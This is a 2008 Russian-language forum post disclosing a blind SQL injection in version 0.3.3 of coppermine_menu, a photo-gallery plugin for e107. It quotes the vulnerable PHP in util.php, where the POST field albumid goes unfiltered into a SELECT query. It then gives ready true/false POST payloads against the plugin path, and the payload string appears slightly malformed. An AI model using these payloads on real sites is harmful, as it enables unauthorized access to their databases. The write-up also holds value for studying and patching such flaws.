Показать сообщение отдельно

  #29  
Старый 15.12.2008, 20:10
eLWAux
Постоянный
Регистрация: 15.06.2008
Сообщений: 941
С нами: 9423746

Репутация: 2399


По умолчанию

coppermine_menu (фотогаллерея) Blind sqlInj
http://web.wilan.com.ru/modules.php?name=Files&go=view_file&lid=115

Уязвимый продукт: coppermine_menu (фотогаллерея)
Версия: v0.3.3

Blind sqlInj
Уязвимость в файле util.php
Уязвимый кусок кода:
PHP код:
$action $_POST['action'];
....
function 
filenametotitle($delete)
{
    
$albumid $_POST['albumid'];
    
$parsemode $_POST['parsemode'];
    ....
    
$query "SELECT * FROM $picturetbl WHERE aid = '$albumid'";
    
$result MYSQL_QUERY($query);
    
$num mysql_numrows($result);
}
......
} else if (
$action == 'title') { ....
filenametotitle(0); ..}
........ 
sqlInj атаку можна произвести из за отсуствия фильтации в POST запросе данних action, albumid

Exploit:
Цитата:
true: \e107_plugins\coppermine_menu\util.php
POST: action=title&albumid=0' 1'='1&parsemode=2

false: \e107_plugins\coppermine_menu\util.php
POST: action=title&albumid=0' 1'='2&parsemode=2
 
Ответить с цитированием